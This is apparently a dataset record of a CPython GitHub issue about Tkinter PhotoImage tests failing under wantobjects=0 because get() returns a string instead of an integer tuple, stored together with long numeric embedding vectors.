-0.005000460427254438, 0.002340343315154314, 0.009185497649013996, 0.02806013636291027, -0.0023883094545453787, -0.013894164934754372, -0.010120836086571217, 0.00035949551966041327, 0.030842168256640434, 0.023647259920835495, -0.01314269658178091, 0.03111397475004196, -0.004240998066961765, 0.005352211184799671, 0.007366785313934088, 0.0029299259185791016, -0.003623435040935874, 0.00501644890755415, 0.01696399226784706, -0.005959781352430582, -0.003173753386363387, 0.014126000925898552, 0.0004993964685127139, 0.006527379620820284, 0.0017947294982150197, -0.006811178755015135, -0.019250372424721718, -0.03244103491306305, 0.009273435920476913, -0.0025382032617926598, 0.007202901411801577, 0.01675613783299923, -0.014557695016264915, -0.005851857829838991, 0.010176796466112137, -0.03207329660654068, 0.01921839639544487, -0.01990590989589691, -0.014461763203144073, 0.023903079330921173, 0.014389813877642155, -0.007178917992860079, -0.014429785311222076, -0.0031537674367427826, -0.017027946189045906, 0.006775204092264175, -0.009177503176033497, -0.001788733759894967, 0.0026041564997285604, -0.012159392237663269, -0.012455183081328869, -0.014989389106631279, -0.010648461990058422, -0.004101097118109465, 0.01840297318994999, 0.014949417673051357, -0.04825384169816971, 0.01361436303704977, 0.0075826323591172695, 0.006487407721579075, 0.020129751414060593, 0.001527918386273086, -0.008817758411169052, -0.013246622867882252, 0.01672416180372238, -0.011775664053857327, -0.00789441168308258, 0.0017007960705086589, -0.002833993872627616, 0.009345384314656258, 0.0034315709490329027, -0.017395686358213425, -0.005739937070757151, 0.015197242610156536, -0.009673153050243855, -0.000014778601325815544, -0.002596162259578705, -0.006123665254563093, -0.016788115724921227, 0.020849240943789482, 0.01755557209253311, 0.009481288492679596, -0.003191740717738867, 0.0003030354855582118, 0.0017697472358122468, -0.0005376194603741169, -0.0066752745769917965, 0.008897701278328896, 0.007214892655611038, -0.016244500875473022, 0.004932508338242769, -0.018195120617747307, -0.011847613379359245, -0.0031717547681182623, 0.017859358340501785, 0.002220428315922618, 0.008234171196818352, 0.0008329104166477919, -0.0010892290156334639, 0.01367831788957119, 0.005687973462045193, 0.005328228231519461, -0.007514680735766888, 0.002919933060184121, 0.01971404440701008, -0.01084032654762268, -0.0009258445934392512, -0.0036634067073464394, -0.006619314197450876, -0.006391475442796946, -0.028715671971440315, 0.018834667280316353, -0.0003280178061686456, 0.00521630747243762, 0.004352918826043606, -0.02901945821940899, 0.006775204092264175, 0.01910647563636303, -0.005408171564340591, 0.015413089655339718, -0.012886878103017807, -0.0026021578814834356, 0.00836208090186119, -0.0003152768185827881, 0.008378068916499615, 0.007230881601572037, 0.008993634022772312, -0.007322816178202629, 0.021632686257362366, 0.002158472081646323, 0.0044328621588647366, 0.02275189384818077, -0.027644431218504906, 0.007019031327217817, 0.017139866948127747, 0.01514927577227354, 0.012231341563165188, 0.0015319156227633357, 0.009457305073738098, 0.004193031694740057, 0.010448603890836239, -0.017891334369778633, 0.002804015064612031, 0.009889000095427036, 0.02430279739201069, 0.002905942965298891, 0.011240043677389622, -0.006811178755015135, 0.010944252833724022, 0.010584507137537003, 0.003731358563527465, 0.011032190173864365, -0.013398515060544014, -0.010704422369599342, -0.00007101223309291527, 0.01239122822880745, 0.00018811684276442975, 0.004237000830471516, -0.013870181515812874, -0.0031058015301823616, 0.010048886761069298, 0.006147648207843304, 0.0059837643057107925, -0.006975062657147646, -0.010352671146392822, -0.012047471478581429, -0.01267902459949255, -0.01373427826911211, -0.0009033605456352234, -0.009609198197722435, 0.0004124580300413072, -0.010576513595879078, 0.012902866117656231, -0.020465513691306114, 0.00506841205060482, -0.0076625756919384, 0.0025721793062984943, 0.032473012804985046, -0.011471879668533802, 0.007210895419120789, -0.005707959644496441, -0.008641882799565792, 0.005628015846014023, 0.027900250628590584, -0.0024842415004968643, -0.006867139134556055, 0.002624142449349165, 0.009465299546718597, -0.005620021838694811, -0.003563477424904704, 0.010760382749140263, -0.008617899380624294, 0.004864556714892387, -0.007562646642327309, -0.006155642680823803, -0.00789441168308258, -0.008090273477137089, 0.03750944882631302, -0.01688404753804207, 0.016772126778960228, -0.0015539000742137432, 0.028635729104280472, -0.008466007187962532, -0.008793774992227554, -0.012782950885593891, 0.010056881234049797, 0.010600496083498001, -0.0016118589555844665, -0.02524612843990326, -0.0066273086704313755, 0.021520765498280525, 0.0007729528588242829, -0.008098267018795013, 0.008158224634826183, 0.0009308410808444023, -0.000556106329895556, -0.012575098313391209, 0.01734771952033043, 0.002544199116528034, -0.003209727816283703, 0.010520553216338158, -0.007526671979576349, 0.0050364346243441105, -0.018562858924269676, 0.0165163092315197, -0.016012664884328842, 0.007982349954545498, -0.010000920854508877, -0.007023028563708067, -0.016436364501714706, 0.008809763938188553, 0.018610825762152672, 0.005056420806795359, -0.018834667280316353, -0.013222640380263329, -0.01640438847243786, 0.012103431858122349, -0.008322108536958694, 0.030346518382430077, 0.004960488528013229, -0.000920848164241761, 0.011391935870051384, -0.03328843414783478, 0.011224054731428623, -0.011831624433398247, -0.0014139990089461207, -0.0006215600296854973, 0.011519845575094223, 0.007066997233778238, 0.012487160973250866, -0.008681854233145714, -0.011591794900596142, 0.003277679905295372, 0.0032556953374296427, 0.0150373550131917, 0.014014080166816711, 0.004624726250767708, -0.0165163092315197, 0.007059003226459026, -0.016788115724921227, 0.007994340732693672, -0.004508808255195618, 0.020801275968551636, 0.0050284406170248985, 0.004564768634736538, 0.007126954849809408, -0.011599788442254066, 0.017619527876377106, -0.009825045242905617, 0.01745964027941227, -0.0017137868562713265, -0.008505978621542454, 0.022112347185611725, 0.016180546954274178, 0.004684683866798878, 0.03325645998120308, 0.03798910975456238, -0.014733570627868176, 0.019634101539850235, -0.02380714751780033, -0.001214140560477972, 0.005524089559912682, -0.020113762468099594, 0.01888263411819935, 0.0002363327075727284, -0.0159247275441885, 0.013222640380263329, -0.010064875707030296, -0.02287980355322361, 0.016364416107535362, 0.005715953651815653, -0.008098267018795013, -0.006911107804626226, 0.006191616877913475, 0.0040331450290977955, 0.00551209831610322, -0.0017487620934844017, -0.0518992617726326, 0.012351256795227528, -0.004776618909090757, 0.007502689026296139, 0.019298339262604713, -0.016292467713356018, 0.009241458028554916, -0.00495249405503273, 0.01580481231212616, -0.006967068184167147, 0.004165051504969597, -0.015860771760344505, 0.007382773794233799, 0.009153520688414574, 0.0034215778578072786, 0.0003032853128388524, 0.011152105405926704, 0.004960488528013229, 0.008066290058195591, 0.008833746425807476, 0.000008283199349534698, 0.0021644679363816977, -0.028939515352249146, 0.0061796256341040134, 0.028395898640155792, -0.015972692519426346, 0.014014080166816711, -0.0070869834162294865, -0.0170919019728899, -0.004800601862370968, -0.009873011149466038, 0.003085815580561757, -0.014901451766490936, -0.003957198932766914, -0.0015169262187555432, -0.01296682097017765, -0.009049594402313232, -0.010776371695101261, -0.001994588179513812, 0.006375486962497234, -0.010096852667629719, 0.02876363880932331, 0.013886170461773872, -0.01043261494487524, 0.01603664830327034, -0.0034655467607080936, -0.001832702662795782, 0.0045407856814563274, 0.0051163784228265285, -0.001984595088288188, -0.0003422577283345163, -0.010296710766851902, 0.02132890187203884, -0.023855114355683327, 0.0012041475856676698, 0.011671737767755985, 0.007910400629043579, -0.020145738497376442, 0.000547112722415477, 0.003385603427886963, 0.0059437924064695835, 0.0007924390374682844, -0.007886417210102081, -0.015005378052592278, 0.005616024602204561, 0.009425328113138676, 0.03546289727091789, 0.01758754998445511, 0.00836208090186119, 0.0035095156636089087, 0.0033656174782663584, -0.013454476371407509, -0.003267686814069748, -0.008833746425807476, -0.0067552183754742146, 0.008154227398335934, -0.003981181886047125, 0.014349842444062233, 0.009145526215434074, 0.008298126049339771, 0.01255910936743021, 0.013230633921921253, -0.016820093616843224, -0.0059837643057107925, -0.02227223478257656, 0.004412876442074776, 0.004600743297487497, 0.015828795731067657, -0.004444853402674198, 0.01538111176341772, 0.007450725883245468, 0.001684807357378304, -0.0007099974318407476, 0.01044060941785574, 0.00005621021045953967, 0.007430740166455507, -0.002058542799204588, -0.003129784483462572, -0.0004911523428745568, 0.02027364820241928, -0.006263566203415394, -0.0097371069714427, -0.0008578927372582257, -0.02171263098716736, -0.001036266447044909, -0.014197949320077896, 0.002833993872627616, -0.027500532567501068, 0.00996894296258688, -0.011000213213264942, 0.022783871740102768, 0.00783445406705141, 0.014517723582684994, -0.02335946448147297, -0.005843863356858492, -0.012431200593709946, -0.008721825666725636, 0.024622570723295212, -0.011423913761973381, -0.01331857219338417, -0.02158472128212452, 0.0005206314381211996, -0.014429785311222076, -0.014629644341766834, 0.0010792360408231616, -0.015421084128320217, -0.0015558985760435462, -0.005564061459153891, -0.004992465954273939, 0.01321464590728283, 0.01909048669040203, 0.006547365337610245, 0.0030358510557562113, 0.03253696858882904, -0.00023870602308306843, -0.015181253664195538, 0.02452663891017437, 0.0001224133447976783, 0.01744365133345127, -0.00554007850587368, -0.018339017406105995, -0.008665865287184715, 0.025629857555031776, -0.005232296418398619, -0.02041754685342312, -0.014086028560996056, -0.015165264718234539, 0.0036773968022316694, 0.0021984437480568886, 0.02086522988975048, 0.006067704875022173, 0.0042170146480202675, -0.0007694553351029754, 0.017299754545092583, 0.005344217177480459, 0.022592008113861084, 0.016948003321886063, -0.004712664056569338, 0.0009373364737257361, -0.004936505574733019, -0.004536788444966078, 0.011543828062713146, -0.03242504596710205, 0.017715459689497948, 0.008849735371768475, 0.010448603890836239, -0.002985886298120022, -0.01291885506361723, -0.008713832125067711, 0.007102971896529198, 0.02230421081185341, -0.0007379776216112077, -0.01550902146846056, 0.008110258728265762, -0.015437072142958641, -0.00046242267126217484, -0.01827506348490715, -0.012167386710643768, 0.03101804293692112, -0.02265596203505993, -0.009017616510391235, -0.00007850692782085389, -0.010656456463038921, -0.018227096647024155, -0.008450018242001534, -0.013910152949392796, 0.010928263887763023, 0.015437072142958641, -0.006371489726006985, 0.006915105041116476, 0.014797525480389595, 0.030490417033433914, 0.0013390521053224802, -0.0200498066842556, 0.016212522983551025, 0.022144325077533722, 0.008418041281402111, -0.005152352619916201, -0.022847827523946762, 0.0015399099793285131, -0.007454723119735718, 0.01526919100433588, -0.013174673542380333, 0.007234878838062286, 0.002893951488658786, -0.0018287055427208543, 0.0005376194603741169, 0.01886664517223835, 0.0027860277332365513, 0.029403185471892357, 0.009041599929332733, 0.011903573758900166, -0.008689848706126213, 0.019378282129764557, 0.00044018839253112674, 0.0006550363032147288, 0.015708880499005318, 0.02335946448147297, -0.005791900213807821, 0.015828795731067657, 0.031545668840408325, -0.008737814612686634, 0.005751928314566612, 0.003953201696276665, -0.018450938165187836, -0.014269898645579815, 0.005839866120368242, 0.029051436111330986, 0.004704669583588839, 0.027068838477134705, 0.006059710402041674, -0.006535373628139496, 0.0019216396613046527, 0.012607076205313206, 0.003819296369329095, 0.01781139150261879, 0.022128336131572723, -0.015525010414421558, 0.007794482633471489, -0.002160470699891448, 0.018418962135910988, 0.014381819404661655, -0.021185003221035004, 0.003961196169257164, -0.011288009583950043, 0.0072228871285915375, 0.05557665973901749, 0.006171631161123514, -0.001423991983756423, -0.03706176578998566, -0.01054453570395708, 0.017299754545092583, -0.02924329973757267, 0.0010082862572744489, 0.0006355501245707273, -0.010896286927163601, 0.01044060941785574, 0.006439441815018654, -0.004464839585125446, 0.0037513445131480694, 0.013334561139345169, -0.003129784483462572, 0.035079170018434525, -0.005120375193655491, -0.0038352850824594498, -0.010712416842579842, 0.0026161482091993093, -0.012255324982106686, 0.018131164833903313, 0.014461763203144073, 0.006599328480660915, 0.00020398061315063387, -0.004600743297487497, -0.008745809085667133, -0.00034725418663583696, -0.0024102937895804644, -0.007238875608891249, -0.005927803926169872, -0.0026301383040845394, -0.004720658529549837, -0.012958826497197151, 0.0011511851334944367, -0.022927770391106606, 0.001430987031199038, -0.005204315762966871, 0.013726283796131611, -0.03127386048436165, 0.01049656979739666, -0.003281676908954978, -0.004053130745887756, 0.007934383116662502, 0.008817758411169052, 0.003757340367883444, -0.01367032341659069, -0.01934630610048771, 0.006691263522952795, -0.011264026165008545, 0.016564274206757545, -0.0058958264999091625, 0.0017267776420339942, -0.013870181515812874, 0.012399222701787949, -0.009321401827037334, 0.0153251513838768, 0.009145526215434074, -0.007226884365081787, 0.010096852667629719, 0.030218608677387238, 0.0023043688852339983, 0.017875347286462784, -0.004268978256732225, -0.004340927116572857, -0.01527718547731638, -0.0009648170089349151, 0.006659286096692085, 0.025038275867700577, -0.009169508703052998, -0.015285179950296879, -0.004960488528013229, -0.005492112133651972, 0.012127415277063847, 0.009177503176033497, -0.016692183911800385, -0.012782950885593891, -0.009425328113138676, -0.002412292407825589, 0.009497277438640594, 0.005923806689679623, 0.000016238505850196816, 0.02489437721669674, 0.018546871840953827, 0.002280385699123144, -0.02406296692788601, 0.011591794900596142, -0.009721118956804276, 0.0025701806880533695, -0.0037793247029185295, -0.019889920949935913, -0.03498323634266853, -0.0002063539286609739, 0.016900036484003067, -0.009489282965660095, -0.006243580486625433, 0.012958826497197151, 0.013238628394901752, -0.005528086796402931, 0.0071749212220311165, 0.008705837652087212, 0.0033496287651360035, 0.02796420454978943, -0.0023523347917944193, -0.006351504009217024, 0.002486240118741989, 0.006055713165551424, 0.025645846500992775, -0.007858437485992908, -0.01688404753804207, -0.02746855653822422, -0.00510038947686553, -0.006727238185703754, -0.0048125931061804295, -0.007027025800198317, 0.019186418503522873, -0.023775169625878334, 0.01056052464991808, 0.0003829789056908339, 0.012599081732332706, -0.0010532544692978263, 0.004013159312307835, 0.008006332442164421, 0.00518433004617691, -0.014429785311222076, 0.00006142527126939967, 0.006747223902493715, -0.00004890288255410269, -0.010824337601661682, -0.005703962408006191, 0.002428281120955944, 0.02017771638929844, -0.020369580015540123, 0.05874241888523102, 0.02454262599349022, 0.02227223478257656, 0.004720658529549837, -0.00392322288826108, 0.008721825666725636, 0.001133197802118957, -0.0007784489425830543, -0.0006895118858665228, -0.015948710963129997, -0.0076305982656776905, -0.017603538930416107, 0.025917652994394302, -0.010776371695101261, 0.012151398696005344, 0.020305626094341278, 0.006163636688143015, -0.0003422577283345163, -0.013958119787275791, -0.007946374826133251, -0.017395686358213425, -0.005520092323422432, 0.0031977363396435976, -0.016836082562804222, 0.008809763938188553, 0.016068626195192337, 0.004496817011386156, 0.01355040818452835, 0.005600035656243563, -0.039907749742269516, 0.01992189697921276, -0.0165163092315197, -0.0024802442640066147, 0.01955415867269039, 0.007802476640790701, 0.0002064788423012942, 0.016292467713356018, 0.021776584908366203, 0.0012691016308963299, -0.0015638929326087236, 0.009425328113138676, -0.006319526582956314, -0.011128122918307781, -0.020673366263508797, 0.0206253994256258, 0.0007374779670499265, 0.006383481435477734, 0.0014659622684121132, 0.00996894296258688, -0.011639760807156563, 0.010640467517077923, -0.003609444946050644, -0.0016168555011972785, -0.00521630747243762, -0.0021704635582864285, -0.01993788592517376, 0.014613655395805836, -0.006671277340501547, -0.01296682097017765, 0.0037233643233776093, -0.001087230397388339, -0.0014060047687962651, -0.001474955934099853, 0.010352671146392822, -0.012431200593709946, 0.007674567401409149, 0.024830423295497894, 0.018115175887942314, -0.014453768730163574, 0.034023914486169815, -0.00484057329595089, -0.009673153050243855, -0.0156209422275424, 0.002981889294460416, -0.0037673332262784243, -0.013886170461773872, 0.00495649129152298, -0.014989389106631279, -0.00979306735098362, -0.006575345527380705, -0.0037293601781129837, -0.01851489394903183, 0.008402052335441113, -0.010824337601661682, 0.006035727448761463, -0.01085631549358368, -0.016324443742632866, -0.017539585009217262, -0.011407924816012383, 0.025981608778238297, 0.011224054731428623, 0.011583800427615643, 0.006151645444333553, -0.002684100065380335, -0.012647047638893127, -0.000215222651604563, -0.01696399226784706, 0.007334807887673378, 0.0044808280654251575, 0.0106084905564785, -0.0019815971609205008, 0.010424620471894741, -0.0016957996413111687, -0.022783871740102768, 0.003071825485676527, -0.02818804606795311, -0.0010772374225780368, -0.024846412241458893, -0.015125293284654617, 0.007510683499276638, 0.01886664517223835, -0.008857729844748974, -0.013990096747875214, 0.0038592680357396603, 0.003489529946818948, 0.0034535552840679884, 0.002462256932631135, 0.021984437480568886, -0.001640838454477489, 0.01757156103849411, -0.0017937303055077791, 0.009033605456352234, 0.012583092786371708, -0.0015778830274939537, 0.012039477936923504, -0.014014080166816711, 0.0011891581816598773, 0.014493740163743496, 0.014541706070303917, -0.00277003925293684, -0.0023003716487437487, -0.005991758778691292, 0.006719243712723255, 0.03322448208928108, 0.01096024177968502, 0.012135409750044346, 0.0014629644574597478, 0.024238841608166695, 0.009729113429784775, 0.013334561139345169, -0.03133781626820564, 0.045120060443878174, 0.003487531328573823, -0.012758968397974968, -0.016932014375925064, 0.007246870081871748, -0.0109042814001441, -0.009441317059099674, -0.016076620668172836, -0.01982596516609192, 0.014141988940536976, 0.018722746521234512, 0.02569381147623062, -0.008809763938188553, -0.005823877640068531, 0.0066672805696725845, 0.0073108249343931675, 0.01699596829712391, -0.019042519852519035, 0.024334773421287537, 0.004760629963129759, 0.004844570532441139, -0.005963778588920832, 0.011335975490510464, -0.011871596798300743, 0.003383604809641838, -0.007870428264141083, -0.0012151398696005344, 0.02276788279414177, -0.0024802442640066147, -0.012295296415686607, 0.0008813760941848159, 0.006027732975780964, 0.0028279980178922415, 0.02227223478257656, 0.01899455487728119, 0.016836082562804222, -0.01285490021109581, 0.012143404223024845, 0.017027946189045906, 0.01068043988198042, -0.013358543626964092, -0.011224054731428623, 0.03044245019555092, 0.04630322381854057, -0.001781738712452352, -0.024494661018252373, -0.019266361370682716, 0.021376868709921837, -0.007482703309506178, 0.004181040450930595, -0.022959748283028603, 0.020833251997828484, -0.005743933841586113, -0.026844996958971024, 0.030826179310679436, 0.02935522049665451, 0.012718996964395046, 0.0341838039457798, -0.0012181376805528998, 0.008569933474063873, -0.024254830554127693, -0.012782950885593891, 0.030922111123800278 ]
null
null
null
null
null
null
null
null
null
[ "python", "cpython" ]
Some of recently added Tkinter tests for `PhotoImage` do not pass if `tkinter.wantobjects=0`, because `PhotoImage.get()` returns a string like `"255 0 0"` instead of a 3-tuple of integers like `(255, 0, 0)`. Other solution is to make `PhotoImage.get()` always returning a 3-tuple of integers, and it is a correct solution, but I am not sure that it can be backported. It can break the code that uses `tkinter.wantobjects=0` and manually parses the returned string. <!-- gh-linked-prs --> ### Linked PRs * gh-119792 * gh-119794 * gh-119798 <!-- /gh-linked-prs -->
Fix new Tkinter tests for wantobjects=0
https://api.github.com/repos/python/cpython/issues/119791/comments
0
2024-05-30T16:46:33
2024-05-31T08:02:17Z
https://github.com/python/cpython/issues/119791
2,326,116,467
119,791
false
This is a GitHub Issue repo:cpython owner:python Title : Fix new Tkinter tests for wantobjects=0 Issue date: --- start body --- Some of recently added Tkinter tests for `PhotoImage` do not pass if `tkinter.wantobjects=0`, because `PhotoImage.get()` returns a string like `"255 0 0"` instead of a 3-tuple of integers like `(255, 0, 0)`. Other solution is to make `PhotoImage.get()` always returning a 3-tuple of integers, and it is a correct solution, but I am not sure that it can be backported. It can break the code that uses `tkinter.wantobjects=0` and manually parses the returned string. <!-- gh-linked-prs --> ### Linked PRs * gh-119792 * gh-119794 * gh-119798 <!-- /gh-linked-prs --> --- end body ---
714
[ -0.0019863646011799574, -0.0030729875434190035, -0.010423139669001102, 0.029298124834895134, 0.024861207231879234, 0.037882596254348755, 0.034458454698324203, 0.0069025419652462006, -0.022281043231487274, -0.026139233261346817, -0.00011868453293573111, -0.017554761841893196, 0.016891635954380035, -0.011363573372364044, -0.05116923525929451, 0.03402440622448921, -0.02628391422331333, 0.02296828292310238, -0.03604995459318161, -0.005202527157962322, 0.015589496120810509, -0.027127893641591072, -0.013829197734594345, -0.014190902933478355, -0.012243722565472126, 0.011086265556514263, -0.011243004351854324, -0.008295106701552868, -0.039618782699108124, -0.012099040672183037, 0.02375197783112526, 0.047962114214897156, 0.007209991104900837, 0.040342193096876144, 0.01538452971726656, -0.024583900347352028, 0.020424289628863335, 0.03706273064017296, 0.021943451836705208, 0.005898809526115656, -0.030069762840867043, -0.0217746552079916, 0.0002665692300070077, -0.002018013969063759, -0.04627415910363197, 0.012020670808851719, 0.00451528700068593, 0.03149247169494629, 0.0018024977762252092, -0.014757574535906315, -0.008041913621127605, -0.047720979899168015, 0.025825753808021545, -0.0143114710226655, 0.034169089049100876, -0.0017331709386780858, -0.002405339851975441, 0.009259654209017754, 0.004726281855255365, -0.01751859113574028, -0.017795898020267487, 0.03125133365392685, -0.022473953664302826, 0.015324246138334274, -0.006980911362916231, 0.02898464724421501, -0.030069762840867043, 0.004605713300406933, 0.019001582637429237, 0.02285977080464363, 0.03390383720397949, 0.010139803402125835, 0.003716521430760622, 0.027272576466202736, 0.031347788870334625, -0.021871110424399376, 0.07128004729747772, 0.005314053036272526, -0.021557632833719254, 0.007149707060307264, -0.03228822350502014, 0.020785994827747345, -0.013744799420237541, 0.012888764031231403, -0.005627530626952648, 0.01394976582378149, 0.011387687176465988, -0.051313918083906174, -0.04487556591629982, -0.005742070730775595, -0.029949193820357323, 0.05025291442871094, -0.009169228374958038, -0.005790298338979483, 0.015625666826963425, -0.023559069260954857, -0.023547012358903885, 0.019761163741350174, -0.03826841339468956, 0.02843003161251545, 0.018820729106664658, -0.021437063813209534, -0.016710782423615456, 0.010561793111264706, 0.03289106488227844, -0.00460269907489419, -0.014106504619121552, 0.005211569834500551, -0.0044369176030159, 0.07012259215116501, -0.004780537914484739, 0.006739774253219366, -0.05290542170405388, -0.034530796110630035, -0.00648055225610733, 0.017783841118216515, -0.0128043657168746, 0.0049252198077738285, -0.01571006514132023, 0.005305010359734297, -0.011321374215185642, 0.0143114710226655, -0.01403416320681572, -0.018374627456068993, -0.04943304881453514, 0.0069145988672971725, -0.013117843307554722, 0.029780399054288864, -0.012454717420041561, -0.026018664240837097, 0.0024008185137063265, 0.025295253843069077, 0.025295253843069077, 0.014202959835529327, 0.028960533440113068, 0.015673894435167313, -0.01487814262509346, 0.04121028631925583, -0.00833730585873127, 0.026428597047924995, -0.06057357043027878, -0.018627820536494255, 0.03834075480699539, 0.04680465906858444, -0.0441521555185318, -0.021376779302954674, 0.034940727055072784, -0.013937708921730518, 0.00769226485863328, 0.01316607091575861, -0.03544711321592331, -0.06327430158853531, 0.01938740164041519, 0.04434506222605705, 0.018736332654953003, 0.014697290025651455, 0.000813836813904345, 0.020376062020659447, -0.016107941046357155, -0.014395869337022305, -0.00863872654736042, -0.01487814262509346, 0.006775944959372282, 0.001130328862927854, 0.020593086257576942, -0.004114397335797548, -0.004174681380391121, 0.003369887126609683, -0.027007324621081352, 0.019568253308534622, 0.023233532905578613, -0.03154069930315018, 0.03617052361369133, 0.007101479917764664, -0.043042924255132675, -0.012171381153166294, 0.007511412259191275, -0.02681441605091095, 0.014540551230311394, -0.010290514677762985, -0.05613665282726288, 0.0032794608268886805, 0.0001892358995974064, 0.00822276622056961, 0.0027534812688827515, -0.03289106488227844, 0.016602270305156708, 0.009000432677567005, -0.02867116965353489, 0.008952205069363117, 0.058403339236974716, -0.014468209818005562, 0.021268269047141075, -0.028164781630039215, -0.027007324621081352, -0.005648630205541849, -0.05010823532938957, -0.06771121919155121, 0.010386968962848186, 0.000020192854208289646, -0.006275585852563381, -0.044128041714429855, -0.04217483103275299, -0.023595238104462624, -0.03351802006363869, 0.033686816692352295, -0.03785848245024681, 0.026066891849040985, 0.02956337481737137, -0.06255089491605759, -0.004804651252925396, -0.01878455840051174, -0.01415473222732544, -0.01990584470331669, -0.03293929249048233, 0.013358980417251587, 0.0042530507780611515, 0.024692412465810776, -0.009319938719272614, 0.008656811900436878, -0.0008258936577476561, 0.040342193096876144, -0.006980911362916231, 0.01745830662548542, -0.05488274246454239, 0.0230888519436121, 0.022100191563367844, 0.001492787734605372, -0.01913420669734478, 0.004138510674238205, 0.03887125849723816, -0.028574714437127113, 0.0008085619192570448, -0.029298124834895134, -0.013612174428999424, 0.04311526566743851, -0.03363858908414841, -0.017506534233689308, -0.018808672204613686, -0.004527343902736902, 0.03761734440922737, -0.004461031407117844, -0.03766557201743126, -0.04745572805404663, -0.01139974407851696, 0.04048687592148781, -0.0013774941908195615, 0.01697603240609169, -0.007222048006951809, 0.05464160442352295, 0.013973879627883434, -0.05015645921230316, -0.005320081487298012, 0.008295106701552868, 0.009368166327476501, 0.00915114302188158, -0.015673894435167313, -0.03289106488227844, -0.03310808539390564, -0.0328669510781765, -0.008572414517402649, 0.04564720392227173, 0.01041108276695013, 0.030214445665478706, -0.003517583478242159, -0.005199512932449579, -0.021569689735770226, -0.031637150794267654, -0.00783091876655817, -0.0011047080624848604, 0.00530802458524704, -0.0018914170796051621, -0.0192547757178545, 0.01686752215027809, -0.03125133365392685, 0.002905698725953698, 0.018736332654953003, -0.0013458449393510818, -0.009910724125802517, -0.007390843704342842, -0.036628685891628265, 0.014130618423223495, -0.0280201006680727, 0.014058277010917664, 0.02531936764717102, -0.019664708524942398, -0.01508310902863741, 0.030431468039751053, -0.038003165274858475, -0.03551945462822914, 0.02765839546918869, -0.002601263578981161, -0.012195494957268238, -0.04439328983426094, 0.01259939931333065, 0.0002490491315256804, -0.013551889918744564, 0.0018190760165452957, -0.02225692942738533, 0.006818144116550684, -0.04697345569729805, -0.009175256825983524, -0.01848313771188259, -0.009760012850165367, -0.035302430391311646, -0.015432757325470448, 0.032649926841259, 0.01686752215027809, -0.01595120131969452, 0.027031438425183296, -0.015324246138334274, -0.02266686223447323, 0.016288792714476585, -0.014890199527144432, -0.039208848029375076, 0.011116407811641693, 0.001351119833998382, 0.0161320548504591, -0.00353868305683136, -0.023197364062070847, -0.009669587016105652, -0.01415473222732544, -0.016168223693966866, 0.006962826009839773, 0.053966421633958817, -0.0314442440867424, 0.013503662310540676, 0.008301135152578354, -0.021557632833719254, -0.04692522808909416, 0.0019667723681777716, -0.00014797889161854982, 0.014950484037399292, -0.00025884530623443425, 0.013744799420237541, -0.018398739397525787, -0.030696718022227287, -0.04077623784542084, 0.037762027233839035, 0.03547122702002525, 0.017976751551032066, 0.014299414120614529, -0.002660040743649006, -0.035422999411821365, 0.017373908311128616, -0.05980193614959717, 0.014854028820991516, 0.01810937561094761, 0.03498895466327667, 0.016541985794901848, 0.0006627495167776942, 0.00803588517010212, -0.01883278600871563, 0.05386997014284134, 0.024523615837097168, -0.029370466247200966, 0.017832068726420403, 0.003559782402589917, 0.019845562055706978, -0.01835051365196705, 0.013250469230115414, -0.05116923525929451, 0.002057198667898774, 0.015034881420433521, 0.016156168654561043, 0.03154069930315018, 0.006806087214499712, 0.03460313379764557, 0.010531650856137276, -0.03028678521513939, 0.004611741751432419, 0.013985936529934406, -0.040824465453624725, 0.0072943889535963535, -0.02640448324382305, -0.01322635542601347, 0.0017979765543714166, 0.014974596910178661, 0.031588923186063766, 0.007053252309560776, -0.01782001182436943, -0.054255787283182144, 0.006079662591218948, -0.04338051751255989, -0.007662123069167137, 0.01943562924861908, 0.012080955319106579, 0.0008130832575261593, -0.026669733226299286, -0.044851452112197876, -0.014190902933478355, -0.01316607091575861, -0.03351802006363869, -0.006474523805081844, -0.026549166068434715, 0.05020468682050705, -0.027007324621081352, -0.018736332654953003, -0.003258361481130123, -0.009163199923932552, -0.010519593954086304, -0.0370868444442749, 0.005419550463557243, 0.0014942948473617435, -0.022365441545844078, -0.0069145988672971725, -0.040342193096876144, 0.002696211216971278, 0.013371037319302559, 0.02058102935552597, -0.009579160250723362, 0.015589496120810509, -0.0027007325552403927, 0.014757574535906315, -0.012454717420041561, 0.025271140038967133, 0.007390843704342842, -0.0019773219246417284, 0.010923498310148716, -0.03084140084683895, 0.026500938460230827, 0.01703631691634655, 0.012611456215381622, -0.008174538612365723, -0.007222048006951809, -0.07658505439758301, 0.017108658328652382, 0.014432039111852646, 0.05854802206158638, -0.04863730072975159, 0.006775944959372282, -0.02320942096412182, 0.0013707121834158897, 0.0073064458556473255, -0.04755218327045441, 0.025005890056490898, -0.042078375816345215, 0.019037753343582153, 0.010127746500074863, -0.02382431924343109, 0.010344769805669785, -0.010091576725244522, -0.0009494762634858489, 0.04108971729874611, -0.015818575397133827, -0.012611456215381622, -0.02657327800989151, 0.043163493275642395, 0.03327688202261925, 0.012322092428803444, 0.015203677117824554, 0.04121028631925583, 0.009549018926918507, 0.001007499871775508, 0.0008658319129608572, -0.0030111961532384157, -0.02782719023525715, -0.009591217152774334, 0.021220041438937187, 0.020906563848257065, -0.016180280596017838, -0.010507537052035332, -0.006534808315336704, 0.030672604218125343, -0.006127889733761549, 0.00676388805732131, 0.01780795492231846, -0.019604424014687538, 0.014082390815019608, -0.017916467040777206, -0.019098037853837013, -0.000048980917199514806, 0.008771352469921112, 0.009579160250723362, 0.00679403031244874, 0.02507822960615158, 0.0023917758371680975, 0.017542704939842224, 0.003945601638406515, -0.012768195010721684, 0.046708203852176666, -0.03742443770170212, 0.0055612181313335896, 0.007264247164130211, 0.016216451302170753, 0.00998909305781126, 0.002929812530055642, 0.0032854892779141665, 0.033807385712862015, 0.014227072708308697, 0.031998857855796814, 0.03363858908414841, 0.0334697924554348, -0.009338024072349072, 0.002742931479588151, 0.019122151657938957, 0.002644969616085291, -0.03221588209271431, 0.042681220918893814, -0.044658541679382324, 0.04417626932263374, -0.0157221220433712, 0.012671740725636482, 0.01806114800274372, 0.05165150761604309, -0.0467805452644825, 0.014239129610359669, 0.01388948131352663, -0.0013616695068776608, -0.010658248327672482, 0.009102915413677692, -0.029201669618487358, 0.015251904726028442, -0.00822276622056961, -0.0007509151473641396, 0.003532654605805874, 0.010374912060797215, -0.004641884006559849, 0.05753524973988533, -0.022003736346960068, -0.018386684358119965, -0.03564002364873886, -0.016276735812425613, 0.017265398055315018, -0.007812833413481712, -0.00026185953174717724, 0.010230230167508125, -0.027754848822951317, -0.012105069123208523, -0.01842285320162773, 